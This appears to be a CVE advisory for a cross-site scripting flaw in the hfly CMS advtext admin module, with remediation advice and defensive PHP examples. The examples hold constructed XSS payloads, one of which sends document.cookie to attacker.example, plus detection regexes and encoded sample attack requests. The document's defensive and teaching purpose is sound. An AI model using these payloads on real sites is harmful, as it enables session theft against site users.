baowzh hfly CVE-2025-14519
Severity (by source): LOW
CVSS 4.0 vector (NVD): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
A security flaw has been discovered in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. This issue affects some unknown processing of the file /admin/index.php/advtext/add of the component advtext Module. The manipulation results in cross-site scripting. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.
Analysis (AI)
Cross-site scripting (XSS) in baowzh hfly up to commit 638ff9abe9078bc977c132b37acbe1900b63491c allows an authenticated user to inject script through the /admin/index.php/advtext/add endpoint of the advtext module; the injected script runs when another user interacts with the affected page. The CVE description does not say whether the injection is stored or reflected, but because the add action persists advertisement text for later display it is most likely stored. Public proof-of-concept code is available. The CVSS 4.0 score of 2.0 (LOW) reflects the privilege requirement (PR:L), the need for victim interaction (UI:P) and the limited integrity impact (VI:L); the EPSS score of 0.05% indicates a minimal probability of exploitation in the wild despite the public proof of concept.
Technical Context (AI)
The flaw is in the add action of the advtext module, handled by /admin/index.php/advtext/add, and is classified as CWE-79 (improper neutralization of input during web page generation) in a PHP-based travel website CMS. Text supplied by the submitting user is neither validated on the way in nor HTML-encoded at the point where it is written into a page. Assuming the stored case, which the persisting add action makes the likely one, the payload is saved to the database and executes in the browser of any user or administrator who later views the affected advertisement content; in the reflected case it would execute only in the browser of whoever submits a crafted request. The CPE entry (cpe:2.3:a:baowzh:hfly:*:*:*:*:*:*:*:*) matches every version, and because the project ships as a rolling release there is no version number to pin: the only fixed reference point is commit 638ff9abe9078bc977c132b37acbe1900b63491c, with that commit and everything before it reported as affected.
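As an added illustration, not code from hfly (whose advtext templates are not shown on this page), the rendering pattern the analysis describes beside its hardened PHP form. The record shape, the h() helper and the attacker strings are assumptions made for the example:

```php
<?php
// Added illustration, not hfly's code: the class of bug behind CVE-2025-14519.
// The real advtext module's field names, table and template are unknown; the
// $row shape, h() and the payloads below are assumptions for this example.

declare(strict_types=1);

// A stored advertisement record as it might come back from the database.
// Both values are constructed attacker payloads that an account with access
// to /admin/index.php/advtext/add could have submitted.
$row = [
    'title' => 'Summer sale" onmouseover="alert(document.cookie)',
    'body'  => '<script>document.location="//attacker.example/?c="+document.cookie</script>',
];

// Vulnerable pattern: the stored value is concatenated straight into the HTML,
// so the quote in 'title' breaks out of the attribute and the <script> in
// 'body' becomes live markup in every viewer's browser.
function renderVulnerable(array $row): string
{
    return '<div class="advtext" title="' . $row['title'] . '">' . $row['body'] . '</div>';
}

// Hardened pattern: encode at the point of output, for the context the value
// lands in (element content and quoted attribute values). ENT_QUOTES escapes
// both quote styles, which is what stops the attribute breakout; ENT_SUBSTITUTE
// keeps htmlspecialchars from silently returning "" on invalid UTF-8.
// This helper is only correct for HTML body and quoted-attribute contexts,
// not for values placed inside <script>, inline event handlers or URLs.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderHardened(array $row): string
{
    return '<div class="advtext" title="' . h($row['title']) . '">' . h($row['body']) . '</div>';
}

echo "Vulnerable:\n" . renderVulnerable($row) . "\n\n";
echo "Hardened:\n" . renderHardened($row) . "\n";
// In the hardened output <, >, " and ' are emitted as entities, so the
// browser renders the payload as visible text instead of executing it.
```

Encoding belongs at output, not at input: a value encoded on the way into the database is corrupted for every non-HTML consumer (e-mail, JSON APIs, exports), and any field added to the form later that bypasses the input filter is unprotected. Templating engines with auto-escaping give the same result as h() by default.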
Remediation (AI)
No vendor patch had been identified at the time of analysis; baowzh did not respond to the disclosure. Organizations running hfly should check the project's Git history for commits after 638ff9abe9078bc977c132b37acbe1900b63491c that touch the advtext module and move to such a commit if one exists. Until then, the following compensating controls apply. Restrict the admin panel, and /admin/index.php/advtext/add in particular, to trusted networks or a VPN, and limit the advtext module to a small set of trusted administrators: the attacker must already hold an account that can reach the endpoint (PR:L), so reducing who can submit advertisement text directly reduces who can plant a payload. In the application itself, HTML-encode advertisement text at the point of output (for example with htmlspecialchars and ENT_QUOTES, or the template engine's auto-escaping); this is the actual fix. Input validation of submissions is a useful second layer but not a substitute, because encoding or filtering on input is easier to bypass and corrupts stored data. A WAF with XSS signatures in front of the add handler is a stop-gap only, since signature-based XSS filtering is routinely bypassed. Set a Content-Security-Policy on admin pages and mark session cookies HttpOnly so that a script which does execute gains less. Monitor application logs for submissions to the advtext add handler that contain script tags, event-handler attributes or javascript: URLs. These measures reduce exposure but do not remove the vulnerability; only a code change does.
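The log-monitoring step above, as an added example that is not part of the advisory or of hfly: a PHP command-line scanner over constructed request-log lines. The five-field log format, the ADVTEXT_ADD constant, the pattern list and the sample traffic are assumptions; the point it makes is that submitted payloads arrive URL-encoded, sometimes twice, so they must be decoded before matching, and that the check should be scoped to the affected handler.

```php
<?php
// Added example, not part of the advisory or of hfly: a small scanner for the
// log-monitoring step. It reads request log lines, URL-decodes the request
// data twice (to catch double-encoded payloads) and flags requests to the
// advtext add handler that carry script tags, event-handler attributes or
// javascript: URLs. The log format is constructed for this example; adapt
// the parser to whatever your reverse proxy or application really logs.

declare(strict_types=1);

const ADVTEXT_ADD = '/admin/index.php/advtext/add';

// Constructs that are almost never legitimate in an advertisement text field.
// Matched against the decoded request data, case-insensitively.
const XSS_PATTERNS = [
    'script tag'      => '/<\s*script\b/i',
    'event handler'   => '/\bon[a-z]+\s*=/i',
    'javascript: URL' => '/javascript\s*:/i',
    'active element'  => '/<\s*(iframe|object|embed|svg)\b/i',
];

function decodeRequestData(string $raw): string
{
    // Decode twice so %253Cscript%253E is caught as well as %3Cscript%3E.
    return urldecode(urldecode($raw));
}

// Returns null for lines that are out of scope or clean, otherwise an alert.
function scanLine(string $line): ?array
{
    // Constructed format: "<time> <client> <method> <path> <query-or-body>"
    $parts = explode(' ', $line, 5);
    if (count($parts) < 5) {
        return null;
    }
    [$time, $client, $method, $path, $data] = $parts;
    if (strpos($path, ADVTEXT_ADD) !== 0) {
        return null; // only the affected handler is of interest here
    }
    $decoded = decodeRequestData($data);
    $hits = [];
    foreach (XSS_PATTERNS as $name => $regex) {
        if (preg_match($regex, $decoded)) {
            $hits[] = $name;
        }
    }
    if ($hits === []) {
        return null;
    }
    return ['time' => $time, 'client' => $client, 'method' => $method, 'hits' => $hits];
}

// Constructed sample log lines, not real traffic. Line 3 is a plain encoded
// <script>, line 4 is a double-encoded attribute breakout, line 5 is a
// payload against an unrelated path and is deliberately ignored.
$sampleLog = [
    '2025-12-10T09:12:01Z 203.0.113.7 GET /admin/index.php/advtext/index -',
    '2025-12-10T09:12:44Z 203.0.113.7 POST /admin/index.php/advtext/add title=Summer+sale&content=Book+early',
    '2025-12-10T09:13:02Z 198.51.100.9 POST /admin/index.php/advtext/add title=x&content=%3Cscript%3Ealert%281%29%3C%2Fscript%3E',
    '2025-12-10T09:13:30Z 198.51.100.9 POST /admin/index.php/advtext/add title=%2522%2520onmouseover%253Dalert%25281%2529&content=y',
    '2025-12-10T09:14:10Z 192.0.2.5 GET /index.php?content=%3Cscript%3E -',
];

foreach ($sampleLog as $line) {
    $alert = scanLine($line);
    if ($alert !== null) {
        printf("[%s] %s %s from %s: %s\n",
            $alert['time'], $alert['method'], ADVTEXT_ADD, $alert['client'], implode(', ', $alert['hits']));
    }
}
// Expected: two alerts, both from 198.51.100.9 (script tag, then event handler).
```

Run it as `php scan.php`; in practice replace $sampleLog with the lines of your proxy or application log. Keep the scope check on the add handler, and expect occasional false positives from legitimate field names or words that begin with "on" followed by "=", which is cheaper to tolerate than missing a real submission.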